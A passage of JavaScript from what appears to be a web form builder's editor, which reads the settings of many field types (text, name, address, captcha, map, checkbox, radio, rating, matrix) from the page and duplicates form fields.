				type_date_fields(id, w_field_label, w_field_label_size, w_field_label_pos, w_day, w_month, w_year, w_day_type, w_month_type, w_year_type, w_day_label, w_month_label, w_year_label, w_day_size, w_month_size, w_year_size, w_required, w_class, w_from, w_to, w_divider, w_attr_name, w_attr_value); break;
			}
			case 'type_own_select':
			{	
				jQuery('#'+id+'_elementform_id_temp option').each(function() {
					w_choices[t]=jQuery(this).html();
					w_choices_value[t]=jQuery(this).val();
					w_choices_checked[t]=jQuery(this)[0].selected;
					if(jQuery(this).attr('where'))
						w_choices_params[t]=jQuery(this).attr('where')+'[where_order_by]'+jQuery(this).attr('order_by')+'[db_info]'+jQuery(this).attr('db_info');
					else
						w_choices_params[t]='';
						
					if(jQuery(this).val())
						w_choices_disabled[t]=false;	
					else
						w_choices_disabled[t]=true;
					t++;		
				});

				w_value_disabled = document.getElementById(id+'_value_disabledform_id_temp').value;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_own_select(id, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_choices, w_choices_checked, w_required, w_value_disabled, w_class, w_attr_name, w_attr_value, w_choices_disabled, w_choices_value, w_choices_params); break;
			}
			
			case 'type_country':
			{	
				w_countries=[];

				select_=document.getElementById(id+'_elementform_id_temp');
				n=select_.childNodes.length;
				for(i=0; i<n; i++)
				{
					w_countries.push(select_.childNodes[i].value);
				}

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_country(id, w_field_label, w_field_label_size, w_countries, w_field_label_pos, w_size, w_required, w_class,  w_attr_name, w_attr_value); break;
			}
			case 'type_captcha':
			{
				w_digit=document.getElementById("_wd_captchaform_id_temp").getAttribute("digit");
				atrs=return_attributes('_wd_captchaform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_captcha(id, w_field_label, w_field_label_size, w_field_label_pos, w_digit, w_class,  w_attr_name, w_attr_value); break;
			}
			
			case 'type_arithmetic_captcha':
			{
				w_count = document.getElementById("_wd_arithmetic_captchaform_id_temp").getAttribute("operations_count");
				w_operations = document.getElementById("_wd_arithmetic_captchaform_id_temp").getAttribute("operations");
				w_input_size = document.getElementById("_wd_arithmetic_captchaform_id_temp").getAttribute("input_size");
				atrs=return_attributes('_wd_captchaform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_arithmetic_captcha(id, w_field_label, w_field_label_size, w_field_label_pos, w_count, w_operations, w_class, w_input_size,  w_attr_name, w_attr_value); break;
			}
			case 'type_recaptcha':
			{
				w_public  = document.getElementById("wd_recaptchaform_id_temp").getAttribute("public_key");
				w_private  = document.getElementById("wd_recaptchaform_id_temp").getAttribute("private_key");
				w_theme  = document.getElementById("wd_recaptchaform_id_temp").getAttribute("theme");
				
				atrs=return_attributes('wd_recaptchaform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_recaptcha(id, w_field_label, w_field_label_size, w_field_label_pos, w_public, w_private, w_theme, w_class,  w_attr_name, w_attr_value); break;
			}
			case 'type_map':
			{
				w_lat=[];
				w_long=[];
				w_info=[];
				
				w_center_x  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_x");
				w_center_y  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_y");
				w_zoom  = document.getElementById(id+"_elementform_id_temp").getAttribute("zoom");
				w_width = parseInt(document.getElementById(id+"_elementform_id_temp").style.width);
				w_height= parseInt(document.getElementById(id+"_elementform_id_temp").style.height);
				
				
				
				for(j=0; j<=20; j++)
					if( document.getElementById(id+"_elementform_id_temp").getAttribute("lat"+j))
					{
						w_lat.push(document.getElementById(id+"_elementform_id_temp").getAttribute("lat"+j));
						w_long.push(document.getElementById(id+"_elementform_id_temp").getAttribute("long"+j));
						w_info.push(document.getElementById(id+"_elementform_id_temp").getAttribute("info"+j));
					}

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_map(id, w_center_x, w_center_y, w_long, w_lat, w_zoom, w_width, w_height, w_class, w_info, w_attr_name, w_attr_value); break;
			}
			
			case 'type_mark_map':
			{
				w_info  = document.getElementById(id+"_elementform_id_temp").getAttribute("info0");
				w_long  = document.getElementById(id+"_elementform_id_temp").getAttribute("long0");
				w_lat   = document.getElementById(id+"_elementform_id_temp").getAttribute("lat0");
				w_zoom  = document.getElementById(id+"_elementform_id_temp").getAttribute("zoom");
				w_width = parseInt(document.getElementById(id+"_elementform_id_temp").style.width);
				w_height= parseInt(document.getElementById(id+"_elementform_id_temp").style.height);
				w_center_x  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_x");
				w_center_y  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_y");
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_mark_map(id, w_field_label, w_field_label_size, w_field_label_pos, w_center_x, w_center_y, w_long, w_lat, w_zoom, w_width, w_height, w_class, w_info, w_attr_name, w_attr_value); break;
			}
			case 'type_submit_reset':
			{
				atrs=return_attributes(id+'_element_submitform_id_temp');
				w_act=!(document.getElementById(id+"_element_resetform_id_temp").style.display=="none");
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_submit_title = document.getElementById(id+"_element_submitform_id_temp").value;
				w_reset_title  = document.getElementById(id+"_element_resetform_id_temp").value;
				type_submit_reset(id, w_submit_title , w_reset_title , w_class, w_act, w_attr_name, w_attr_value); break;
			}

			case 'type_button':
			{
				w_title	=new Array();	
			
				w_func	=new Array();
				t=0;
				v=0;
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_elementform_id_temp"+k))
					{
						w_title[t]=document.getElementById(id+"_elementform_id_temp"+k).value;
						w_func[t]=document.getElementById(id+"_elementform_id_temp"+k).getAttribute("onclick");
						t++;
						v=k;
					}
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_button (id, w_title , w_func , w_class,w_attr_name, w_attr_value); break;
			}
			case 'type_hidden':
			{
				w_value  = document.getElementById(id+"_elementform_id_temp").value;
				w_name  = document.getElementById(id+"_elementform_id_temp").name;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_hidden (id, w_name, w_value , w_attr_name, w_attr_value); break;
			}

		}
	
		
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

	var pos=document.getElementsByName("el_pos");
		pos[0].setAttribute("disabled", "disabled");
		pos[1].setAttribute("disabled", "disabled");
		pos[2].setAttribute("disabled", "disabled");
		
	var sel_el_pos=document.getElementById("sel_el_pos");
		sel_el_pos.setAttribute("disabled", "disabled");

}

function duplicate(id) {
  document.getElementById('pos_end').checked = true;
	type=document.getElementById("wdform_field"+id).getAttribute('type');
	//////////////////////////////parameter take
	if(document.getElementById(id+'_element_labelform_id_temp').innerHTML)
		w_field_label=document.getElementById(id+'_element_labelform_id_temp').innerHTML;
	labels=all_labels();
	m=0;
	t=true;
	if(type!="type_section_break")
	{
	while(t)
	{	
		m++;
		for(k=0; k<labels.length; k++)
		{
			t=true;
			if(labels[k]==w_field_label+'('+m+')')
				break;
			t=false;
		}	
	}
	w_field_label=w_field_label+'('+m+')';
	}
	k=0;
	
	w_choices=new Array();	
	w_choices_value=new Array();
	w_choices_params=new Array();
	w_choices_checked=new Array();
	w_choices_disabled=new Array();
	w_allow_other_num=0;
    w_property=new Array();	
	
	w_property_values=new Array();
	w_choices_price=new Array();
	
	t=0;
	
	if(document.getElementById(id+'_label_sectionform_id_temp'))
	if(document.getElementById(id+'_label_sectionform_id_temp').style.display=="block")
		w_field_label_pos="top";
	else
		w_field_label_pos="left";
	
	if(document.getElementById(id+"_elementform_id_temp"))
	{
		s=document.getElementById(id+"_elementform_id_temp").style.width;
		 w_size=s.substring(0,s.length-2);
	}
	
	if(document.getElementById(id+"_label_sectionform_id_temp"))
	{
		s=document.getElementById(id+"_label_sectionform_id_temp").style.width;
		w_field_label_size=s.substring(0,s.length-2);
	}
	
	if(document.getElementById(id+"_requiredform_id_temp"))
	  	w_required=document.getElementById(id+"_requiredform_id_temp").value;
		
	if(document.getElementById(id+"_uniqueform_id_temp"))
	  	w_unique=document.getElementById(id+"_uniqueform_id_temp").value;
		
	if(document.getElementById(id+'_label_sectionform_id_temp'))
	{
		w_class=document.getElementById(id+'_label_sectionform_id_temp').getAttribute("class");
		if(!w_class)
			w_class="";
	}
		

	switch(type)
		{
			case 'type_editor':
			{
				w_editor=document.getElementById("wdform_field"+id).innerHTML;
				type_editor(gen, w_editor); break;
			}
			case 'type_section_break':
			{
				w_editor=document.getElementById(id+"_element_sectionform_id_temp").innerHTML;
				type_section_break(gen, w_editor);  break;
			}
			case 'type_send_copy':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").checked;
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_send_copy(id, w_field_label, w_field_label_size, w_field_label_pos, w_first_val, w_required, w_attr_name, w_attr_value); break;
			}
			case 'type_text':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				w_regExp_status = document.getElementById(id+"_regExpStatusform_id_temp").value;
				w_regExp_value = unescape(document.getElementById(id+"_regExp_valueform_id_temp").value);
				w_regExp_common = document.getElementById(id+"_regExp_commonform_id_temp").value;
				w_regExp_arg = document.getElementById(id+"_regArgumentform_id_temp").value;
				w_regExp_alert = document.getElementById(id+"_regExp_alertform_id_temp").value;
				atrs = return_attributes(id+'_elementform_id_temp');
				w_attr_name = atrs[0];
				w_attr_value = atrs[1];
				type_text(gen, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_regExp_status, w_regExp_value, w_regExp_common, w_regExp_arg, w_regExp_alert, w_unique, w_attr_name, w_attr_value);  break;
			}
			case 'type_number':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_number(gen, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_unique, w_class,  w_attr_name, w_attr_value); break;
			}
			case 'type_password':
			{
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_password(gen, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_required, w_unique, w_class, w_attr_name, w_attr_value);  break;
			}
			case 'type_textarea':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				s=document.getElementById(id+"_elementform_id_temp").style.height;
				w_size_h=s.substring(0,s.length-2);

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_textarea(gen, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_size_h, w_first_val, w_title, w_required, w_unique, w_class, w_attr_name, w_attr_value);  break;
			}
			
				case 'type_wdeditor':
			{
			
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				s=document.getElementById(id+"_elementform_id_temp").style.height;
				w_size_h=s.substring(0,s.length-2);
				w=document.getElementById(id+"_elementform_id_temp").style.width;
				w_size_w=w.substring(0,w.length-2);

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_wdeditor(gen, w_field_label, w_field_label_size, w_field_label_pos, w_size_w, w_size_h, w_title, w_required, w_class, w_attr_name, w_attr_value); break;
			}
			
			case 'type_phone':
			{
				w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value];
				w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title];
				s=document.getElementById(id+"_element_lastform_id_temp").style.width;
				w_size=s.substring(0,s.length-2);

				w_mini_labels= [document.getElementById(id+"_mini_label_area_code").innerHTML, document.getElementById(id+"_mini_label_phone_number").innerHTML];

				atrs=return_attributes(id+'_element_firstform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_phone(gen, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_first_val, w_title, w_mini_labels, w_required, w_unique, w_class, w_attr_name, w_attr_value); break;
			}
			case 'type_name':
			{
				if(document.getElementById(id+"_enable_fieldsform_id_temp")) {
					w_name_format="normal";
				
					w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value];
					w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title];
					
					var title_middle = ['title', 'middle'];
					for(var l=0; l<2; l++)
					{
						w_first_val.push(document.getElementById(id+'_element_'+title_middle[l]+'form_id_temp') ? document.getElementById(id+'_element_'+title_middle[l]+'form_id_temp').value : '');
						w_title.push(document.getElementById(id+'_element_'+title_middle[l]+'form_id_temp') ? document.getElementById(id+'_element_'+title_middle[l]+'form_id_temp').title : '');
					}
					
				}
				else
				{
					if(document.getElementById(id+'_element_middleform_id_temp'))
						w_name_format="extended";
					else
						w_name_format="normal";

					if(w_name_format=="normal")	{
						w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value];
						w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title];
					}
					else {
						w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value, document.getElementById(id+"_element_titleform_id_temp").value, document.getElementById(id+"_element_middleform_id_temp").value];
						w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title, document.getElementById(id+"_element_titleform_id_temp").title,document.getElementById(id+"_element_middleform_id_temp").title];
					}
				}
	
				if(document.getElementById(id+"_mini_label_title"))
					w_mini_title = document.getElementById(id+"_mini_label_title").innerHTML;
				else
					w_mini_title = "Title";
			
				if(document.getElementById(id+"_mini_label_middle"))
					w_mini_middle = document.getElementById(id+"_mini_label_middle").innerHTML;
				else
					w_mini_middle = "Middle";
				
				w_mini_labels = [w_mini_title, document.getElementById(id+"_mini_label_first").innerHTML,document.getElementById(id+"_mini_label_last").innerHTML, w_mini_middle];
				w_name_title = 	document.getElementById(id+'_enable_fieldsform_id_temp') ? document.getElementById(id+'_enable_fieldsform_id_temp').getAttribute('title') : (w_name_format=="normal" ? 'no' : 'yes');			
				w_name_middle = document.getElementById(id+'_enable_fieldsform_id_temp') ? document.getElementById(id+'_enable_fieldsform_id_temp').getAttribute('middle') : (w_name_format=="normal" ? 'no' : 'yes');			
				w_name_fields = [w_name_title, w_name_middle]; 	    
				 
				s=document.getElementById(id+"_element_firstform_id_temp").style.width;
				w_size=s.substring(0,s.length-2);
				atrs=return_attributes(id+'_element_firstform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_name(gen, w_field_label, w_field_label_size, w_field_label_pos,w_first_val, w_title, w_mini_labels,  w_size, w_name_format, w_required, w_unique, w_class, w_attr_name, w_attr_value, w_name_fields);break;
			}
			
			case 'type_address':
			{
				s=document.getElementById(id+"_div_address").style.width;
				w_size=s.substring(0,s.length-2);


				if(document.getElementById(id+"_mini_label_street1"))
					w_street1= document.getElementById(id+"_mini_label_street1").innerHTML; 
				else
					w_street1 = document.getElementById(id+"_street1form_id_temp").value;
					
					
				if(document.getElementById(id+"_mini_label_street2"))
					w_street2= document.getElementById(id+"_mini_label_street2").innerHTML;
				else
					w_street2 = document.getElementById(id+"_street2form_id_temp").value;	
					
				if(document.getElementById(id+"_mini_label_city"))
					w_city= document.getElementById(id+"_mini_label_city").innerHTML;
				else
					w_city = document.getElementById(id+"_cityform_id_temp").value;					
					
				if(document.getElementById(id+"_mini_label_state"))
					w_state= document.getElementById(id+"_mini_label_state").innerHTML; 
				else
					w_state = document.getElementById(id+"_stateform_id_temp").value;	
					
				if(document.getElementById(id+"_mini_label_postal"))
					w_postal= document.getElementById(id+"_mini_label_postal").innerHTML; 
				else
					w_postal = document.getElementById(id+"_postalform_id_temp").value;	
					
				if(document.getElementById(id+"_mini_label_country"))
					w_country= document.getElementById(id+"_mini_label_country").innerHTML; 
				else
					w_country = document.getElementById(id+"_countryform_id_temp").value;					
					
				w_mini_labels=[w_street1, w_street2, w_city, w_state, w_postal, w_country];


				var disabled_input = document.getElementById(id+"_disable_fieldsform_id_temp");
				
					w_street1_dis= disabled_input.getAttribute('street1');
					w_street2_dis= disabled_input.getAttribute('street2');
					w_city_dis= disabled_input.getAttribute('city');
					w_state_dis= disabled_input.getAttribute('state');
					w_us_states_dis= disabled_input.getAttribute('us_states');
					w_postal_dis= disabled_input.getAttribute('postal');
					w_country_dis= disabled_input.getAttribute('country');
				
						
				w_disabled_fields=[w_street1_dis, w_street2_dis, w_city_dis, w_state_dis, w_postal_dis, w_country_dis,  w_us_states_dis];

				
				atrs=return_attributes(id+'_street1form_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_address(gen, w_field_label, w_field_label_size, w_field_label_pos, w_size,  w_mini_labels, w_disabled_fields, w_required, w_class, w_attr_name, w_attr_value); break;
			}

			case 'type_submitter_mail':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
		
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_submitter_mail(gen, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_unique, w_class, w_attr_name, w_attr_value); break;
			}
			case 'type_checkbox':
			{	

				w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
				w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;

				if(document.getElementById(id+"_rowcol_numform_id_temp").value)	
				{
				
                if(document.getElementById(id+'_table_little').getAttribute('for_hor'))
					w_flow="hor"	
				else
					w_flow="ver";				
				w_rowcol = 	document.getElementById(id+"_rowcol_numform_id_temp").value;
				}
				else
				{
					if(document.getElementById(id+'_hor'))
						w_flow="hor"	
					else
						w_flow="ver";
					
					w_rowcol = 1;
				}
				
				v=0;
				if(w_flow=="ver")
				{
					var table_little = document.getElementById(id+'_table_little');
					for(k=0;k < table_little.childNodes.length; k++)
					{
						var td_little = table_little.childNodes[k];
							for(m=0; m < td_little.childNodes.length; m++)
							{
								var idi = td_little.childNodes[m].getAttribute('idi');
								if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other'))
									if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other')=='1')
										w_allow_other_num=t;
								w_choices[t]=document.getElementById(id+"_label_element"+idi).innerHTML;
								w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+idi).checked;
								w_choices_value[t]=document.getElementById(id+"_elementform_id_temp"+idi).value;
								if(document.getElementById(id+"_label_element"+idi).getAttribute('where'))
									w_choices_params[t]=document.getElementById(id+"_label_element"+idi).getAttribute('where')+'[where_order_by]'+document.getElementById(id+"_label_element"+idi).getAttribute('order_by')+'[db_info]'+document.getElementById(id+"_label_element"+idi).getAttribute('db_info');
								else
									w_choices_params[t]='';
								t++;
								v=idi;
							}
					}
				
				}
				else
				{
					var table_little = document.getElementById(id+'_table_little');
					var	tr_little = table_little.childNodes;
					var td_max = tr_little[0].childNodes;
					
					for(k=0;k < td_max.length; k++)
					{
						for(m=0; m < tr_little.length; m++)
						{
							if(tr_little[m].childNodes[k])
							{
								var td_little = tr_little[m].childNodes[k];
								var idi = td_little.getAttribute('idi');
								if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other'))
									if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other')=='1')
										w_allow_other_num=t;
								w_choices[t]=document.getElementById(id+"_label_element"+idi).innerHTML;
								w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+idi).checked;
								w_choices_value[t]=document.getElementById(id+"_elementform_id_temp"+idi).value;
								if(document.getElementById(id+"_label_element"+idi).getAttribute('where'))
									w_choices_params[t]=document.getElementById(id+"_label_element"+idi).getAttribute('where')+'[where_order_by]'+document.getElementById(id+"_label_element"+idi).getAttribute('order_by')+'[db_info]'+document.getElementById(id+"_label_element"+idi).getAttribute('db_info');
								else
									w_choices_params[t]='';
								t++;
								v=idi;
							}
						}
					}
				
				}
					
				if(document.getElementById(id+"_option_left_right"))
					w_field_option_pos = document.getElementById(id+"_option_left_right").value;
				else
					w_field_option_pos = 'left';

				w_value_disabled = document.getElementById(id+"_value_disabledform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_checkbox(gen, w_field_label,w_field_label_size, w_field_label_pos, w_field_option_pos, w_flow, w_choices, w_choices_checked, w_rowcol, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value, w_value_disabled, w_choices_value, w_choices_params); break;
			}
		case 'type_radio':
			{	
		
				w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
				w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;

				if(document.getElementById(id+"_rowcol_numform_id_temp").value)	
				{
				
                if(document.getElementById(id+'_table_little').getAttribute('for_hor'))
					w_flow="hor"	
				else
					w_flow="ver";				
				w_rowcol = 	document.getElementById(id+"_rowcol_numform_id_temp").value;
				}
				else
				{
					if(document.getElementById(id+'_table_little').getAttribute('for_hor'))
						w_flow="hor"	
					else
						w_flow="ver";
					
					w_rowcol = 1;
				}
				
				v=0;
				if(w_flow=="ver")
				{	
					var table_little = document.getElementById(id+'_table_little');
					for(k=0;k < table_little.childNodes.length; k++)
					{
						var td_little = table_little.childNodes[k];
							for(m=0; m < td_little.childNodes.length; m++)
							{
								var idi = td_little.childNodes[m].getAttribute('idi');
								if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other'))
									if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other')=='1')
										w_allow_other_num=t;
								w_choices[t]=document.getElementById(id+"_label_element"+idi).innerHTML;
								w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+idi).checked;
								w_choices_value[t]=document.getElementById(id+"_elementform_id_temp"+idi).value;
								if(document.getElementById(id+"_label_element"+idi).getAttribute('where'))
									w_choices_params[t]=document.getElementById(id+"_label_element"+idi).getAttribute('where')+'[where_order_by]'+document.getElementById(id+"_label_element"+idi).getAttribute('order_by')+'[db_info]'+document.getElementById(id+"_label_element"+idi).getAttribute('db_info');
								else
									w_choices_params[t]='';
								t++;
								v=idi;
							}
					}
				}
				else
				{
					var table_little = document.getElementById(id+'_table_little');
					var	tr_little = table_little.childNodes;
					var td_max = tr_little[0].childNodes;
					
					for(k=0;k < td_max.length; k++)
					{
						for(m=0; m < tr_little.length; m++)
						{
							if(tr_little[m].childNodes[k])
							{
								var td_little = tr_little[m].childNodes[k];
								var idi = td_little.getAttribute('idi');
								if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other'))
									if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other')=='1')
										w_allow_other_num=t;
								w_choices[t]=document.getElementById(id+"_label_element"+idi).innerHTML;
								w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+idi).checked;
								w_choices_value[t]=document.getElementById(id+"_elementform_id_temp"+idi).value;
								if(document.getElementById(id+"_label_element"+idi).getAttribute('where'))
									w_choices_params[t]=document.getElementById(id+"_label_element"+idi).getAttribute('where')+'[where_order_by]'+document.getElementById(id+"_label_element"+idi).getAttribute('order_by')+'[db_info]'+document.getElementById(id+"_label_element"+idi).getAttribute('db_info');
								else
									w_choices_params[t]='';
								t++;
								v=idi;
							}
						}
					}
				
				}

				if(document.getElementById(id+"_option_left_right"))
					w_field_option_pos = document.getElementById(id+"_option_left_right").value;
				else
					w_field_option_pos = 'left';
				
				w_value_disabled = document.getElementById(id+"_value_disabledform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_radio(gen, w_field_label, w_field_label_size, w_field_label_pos, w_field_option_pos, w_flow, w_choices, w_choices_checked, w_rowcol, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value, w_value_disabled, w_choices_value, w_choices_params); break;
			}
			
			
			
			case 'type_star_rating':
			{
				w_star_amount  = document.getElementById(id+"_star_amountform_id_temp").value;
				w_field_label_col  = document.getElementById(id+"_star_colorform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_star_rating(gen, w_field_label, w_field_label_size, w_field_label_pos, w_field_label_col, w_star_amount, w_required, w_class, w_attr_name, w_attr_value) ; break;
			}
			
			case 'type_scale_rating':
			{
				w_mini_labels  =[document.getElementById(id+"_mini_label_worst").innerHTML,document.getElementById(id+"_mini_label_best").innerHTML];	
			
				w_scale_amount = document.getElementById(id+"_scale_amountform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_scale_rating(gen, w_field_label, w_field_label_size, w_field_label_pos, w_mini_labels,  w_scale_amount, w_required, w_class, w_attr_name, w_attr_value) ; break;
			}
			
			case 'type_spinner':
			{
				w_field_min_value  = document.getElementById(id+"_min_valueform_id_temp").value;
				w_field_max_value  = document.getElementById(id+"_max_valueform_id_temp").value;
				w_field_width  = document.getElementById(id+"_spinner_widthform_id_temp").value;
				w_field_step = document.getElementById(id+"_stepform_id_temp").value;
				w_field_value  = document.getElementById(id+"_elementform_id_temp").getAttribute("aria-valuenow");
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_spinner(gen, w_field_label, w_field_label_size, w_field_label_pos, w_field_width, w_field_min_value, w_field_max_value, w_field_step, w_field_value, w_required, w_class, w_attr_name, w_attr_value) ; break;
			
			
			}
			
			case 'type_slider':
			{
				w_field_min_value  = document.getElementById(id+"_slider_min_valueform_id_temp").value;
				w_field_max_value  = document.getElementById(id+"_slider_max_valueform_id_temp").value;
				w_field_width  = document.getElementById(id+"_slider_widthform_id_temp").value;
				w_field_value  = document.getElementById(id+"_slider_valueform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_slider(gen, w_field_label, w_field_label_size, w_field_label_pos,  w_field_width, w_field_min_value, w_field_max_value, w_field_value, w_required, w_class, w_attr_name, w_attr_value); break;
			}
			
			case 'type_range':
			{
				
				w_field_range_width  = document.getElementById(id+"_range_widthform_id_temp").value;
				w_field_range_step = document.getElementById(id+"_range_stepform_id_temp").value;
				
				w_field_value1  = document.getElementById(id+"_elementform_id_temp0").getAttribute("aria-valuenow");
				w_field_value2  = document.getElementById(id+"_elementform_id_temp1").getAttribute("aria-valuenow");
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				w_mini_labels = [document.getElementById(id+"_mini_label_from").innerHTML,document.getElementById(id+"_mini_label_to").innerHTML]; 	 
				
				type_range(gen, w_field_label, w_field_label_size, w_field_label_pos, w_field_range_width, w_field_range_step, w_field_value1, w_field_value2, w_mini_labels, w_required, w_class, w_attr_name, w_attr_value) ;  break;
			
			}
			case 'type_grading':
			{
			
				w_total = document.getElementById(id+"_grading_totalform_id_temp").value;
				w_items=[];
				
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp"+k))
					{
						
						w_items.push(document.getElementById(id+"_label_elementform_id_temp"+k).innerHTML);
						
					}
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_grading(gen, w_field_label, w_field_label_size, w_field_label_pos, w_items, w_total, w_required, w_class, w_attr_name, w_attr_value) ; refresh_grading_items(id); break;
			
			
			}
			case 'type_matrix':
			{	
                w_rows=[];
				w_rows[0]="";
				for(k=1;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp"+k+"_0"))
					{
						
						w_rows.push(document.getElementById(id+"_label_elementform_id_temp"+k+"_0").innerHTML);
						
					}
			
			    w_columns=[];
				w_columns[0]="";
				for(k=1;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp0_"+k))
					{
						
						w_columns.push(document.getElementById(id+"_label_elementform_id_temp0_"+k).innerHTML);
						
					}
					
			w_field_input_type = document.getElementById(id+"_input_typeform_id_temp").value;		
			w_textbox_size = document.getElementById(id+"_textbox_sizeform_id_temp") ? document.getElementById(id+"_textbox_sizeform_id_temp").value : '100';		
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			type_matrix(gen, w_field_label, w_field_label_size, w_field_label_pos, w_field_input_type, w_rows, w_columns, w_required, w_class, w_attr_name, w_attr_value, w_textbox_size); refresh_matrix(id); break; 
			
			
			}
		
			
			case 'type_time':
			{	
				atrs=return_attributes(id+'_hhform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_hh=document.getElementById(id+'_hhform_id_temp').value;
				w_mm=document.getElementById(id+'_mmform_id_temp').value;
				if(document.getElementById(id+'_ssform_id_temp'))
				{
